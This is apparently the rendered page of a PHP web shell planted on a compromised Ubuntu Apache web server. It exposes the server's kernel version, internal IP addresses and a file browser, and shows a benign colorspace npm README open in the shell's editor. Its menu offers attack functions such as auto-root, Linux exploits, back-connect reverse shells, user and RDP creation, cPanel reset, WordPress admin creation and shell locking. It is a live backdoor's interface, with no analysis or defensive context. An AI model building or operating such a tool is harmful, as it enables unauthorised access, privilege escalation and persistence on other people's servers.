Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
colorspace /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
drwxrwxr-x
LICENSE.md
1.09
KB
-rw-rw-r--
README.md
973
B
-rw-rw-r--
index.js
740
B
-rw-rw-r--
package.json
750
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# colorspace Colorspace is a simple module which generates HEX color codes for namespaces. The base color is decided by the first part of the namespace. All other parts of the namespace alters the color tone. This way you can visually see which namespaces belong together and which does not. ## Installation The module is released in the public npm registry and can be installed by running: ``` npm install --save colorspace ``` ## Usage We assume that you've already required the module using the following code: ```js 'use strict'; var colorspace = require('colorspace'); ``` The returned function accepts 2 arguments: 1. `namespace` **string**, The namespace that needs to have a HEX color generated. 2. `delimiter`, **string**, **optional**, Delimiter to find the different sections of the namespace. Defaults to `:` #### Example ```js console.log(colorspace('color')) // #6b4b3a console.log(colorspace('color:space')) // #796B67 ``` ## License MIT
Close